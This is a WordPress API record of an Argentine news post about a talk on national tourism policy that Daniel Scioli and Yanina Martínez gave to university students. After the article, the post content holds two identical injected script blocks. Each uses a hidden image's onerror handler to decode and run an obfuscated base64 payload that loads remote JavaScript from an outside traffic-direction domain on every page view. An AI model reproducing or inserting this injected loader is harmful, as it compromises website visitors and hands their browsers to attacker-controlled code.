{"id":4353,"date":"2024-08-27T08:33:29","date_gmt":"2024-08-27T11:33:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4353"},"modified":"2025-08-13T23:49:50","modified_gmt":"2025-08-14T02:49:50","slug":"scioli-no-hay-mejor-pais-que-este-por-la-diversidad-de-sus-atractivos-por-la-hospitalidad-por-la-infraestructura-moderna-renovada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4353","title":{"rendered":"Scioli: \u201cNo hay mejor pa\u00eds que \u00e9ste, por la diversidad de sus atractivos, por la hospitalidad, por la infraestructura moderna renovada\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-bc5366c54cf01e8d0a5fde32a06b6186\" style=\"background-color:#0777b8\"><em>Lo asegur\u00f3 el funcionario nacional durante una exposici\u00f3n a estudiantes de turismo realizada junto a la subsecretaria Yanina Mart\u00ednez.<\/em><\/h3>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,\u00a0<strong>Daniel Scioli<\/strong>, y la subsecretaria de Turismo,\u00a0<strong>Yanina Mart\u00ednez<\/strong>, brindaron una charla en el auditorio de la\u00a0<strong>Facultad de Turismo y Hospitalidad de la Universidad Abierta Interamericana (UAI)<\/strong>\u00a0<em>con el objetivo de detallar algunas de las principales l\u00edneas de trabajo llevadas adelante desde la Naci\u00f3n y las oportunidades de desarrollo y trabajo asociadas<\/em>. Los funcionarios tambi\u00e9n buscaron alentar vocaciones y acercarse a los j\u00f3venes en formaci\u00f3n.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>\u00a0inici\u00f3 la conversaci\u00f3n manifestando su compromiso por \u201c<em>orientar, motivar y explicar\u201d lo realizado desde el \u00e1rea a su cargo<\/em>. En relaci\u00f3n con el desarrollo econ\u00f3mico, el secretario explic\u00f3: \u201c<em>Tenemos que integrar y ampliar posibilidades y oportunidades y estar muy atentos al poder extraordinario que tiene el turismo para generar trabajo local<\/em>\u201d. \u201c<em>Lo que pusimos en marcha \u2014indic\u00f3\u2014, conjuntamente con el sector privado y las provincias, es un plan federal de turismo<\/em>\u201d.<\/p>\n\n\n\n<p>A la vez, destac\u00f3 el regreso del cr\u00e9dito en cuotas del Banco Naci\u00f3n, la desregulaci\u00f3n a\u00e9rea mediante la pol\u00edtica Cielos Abiertos y otras iniciativas en transporte, as\u00ed como las oportunidades que ofrece el&nbsp;<em>turismo de cruceros que \u201cmueve 700.000 visitantes por a\u00f1o<\/em>\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, afirm\u00f3: \u201c<em>S\u00e9 del potencial del turismo, que es una actividad que va camino a ser el mayor empleador mundial\u201d. \u201cNo hay mejor pa\u00eds que \u00e9ste, por la diversidad de sus atractivos, por la hospitalidad, por la infraestructura moderna renovada<\/em>\u201d, agreg\u00f3 y puntualiz\u00f3 \u201c<em>Tenemos que hacer esto con ustedes, con el sector privado y con pol\u00edticas p\u00fablicas que faciliten todo<\/em>\u201d.<\/p>\n\n\n\n<p><strong>Mart\u00ednez<\/strong>, por su parte, explic\u00f3: \u201c<em>Para nosotros es fundamental trabajar con los estudiantes, ya que son el futuro de la actividad tur\u00edstica, y el futuro tiene que ser dise\u00f1ado por personas formadas, capaces y comprometidas con la sostenibilidad de nuestro pa\u00eds<\/em>\u201d.<\/p>\n\n\n\n<p>Asimismo, la subsecretaria afirm\u00f3: \u201c<em>El turismo es una de las actividades que incentiva el arraigo, les permite a los j\u00f3venes desarrollarse en sus lugares de origen. Y la profesionalizaci\u00f3n de nuestra actividad ayuda a crear un ambiente propicio para el crecimiento de sus destinos<\/em>\u201d.<\/p>\n\n\n\n<p>Al cierre de la actividad, la decana de la facultad,&nbsp;<strong>Elisa Beltritti<\/strong>, remarc\u00f3 la importancia de \u201c<em>darse cuenta de que existen oportunidades que est\u00e1n disponibles<\/em>\u201d y les se\u00f1al\u00f3 a los estudiantes: \u201cHay que encontrar la forma de que esas oportunidades se conviertan en hechos. Esto es para lo cual est\u00e1n convocados\u201d.<\/p>\n\n\n\n<p>En el encuentro tambi\u00e9n participaron el rector de la UAI,&nbsp;<strong>Rodolfo De Vincenzi<\/strong>, y el vicerrector de Extensi\u00f3n de esa casa de estudios,&nbsp;<strong>Fernando Grosso<\/strong>.<\/p>\n\n\n\n<p>Este tipo de charlas se replicar\u00e1 en otras casas de estudios, con el objetivo de&nbsp;<strong>resolver dudas y generar motivaciones para los que eligen carreras vinculadas con el sector tur\u00edstico<\/strong>. En nuestro pa\u00eds, alrededor de&nbsp;<strong>68 universidades p\u00fablicas y privadas dictan carreras de Turismo de pregrado, grado y posgrado<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-no-hay-mejor-pais-que-este-por-la-diversidad-de-sus-atractivos-por-la-hospitalidad\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:342px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo asegur\u00f3 el funcionario nacional durante una exposici\u00f3n a estudiantes de turismo realizada junto a la subsecretaria Yanina Mart\u00ednez. El secretario de Turismo, Ambiente y Deportes,\u00a0Daniel Scioli, y la subsecretaria de Turismo,\u00a0Yanina Mart\u00ednez, brindaron una charla en el auditorio de la\u00a0Facultad de Turismo y Hospitalidad de la Universidad Abierta Interamericana (UAI)\u00a0con el objetivo de detallar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4354,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[32,21],"tags":[],"class_list":{"0":"post-4353","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ciencia-y-tecnologia","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4353"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4353"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4353\/revisions"}],"predecessor-version":[{"id":6699,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4353\/revisions\/6699"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4354"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}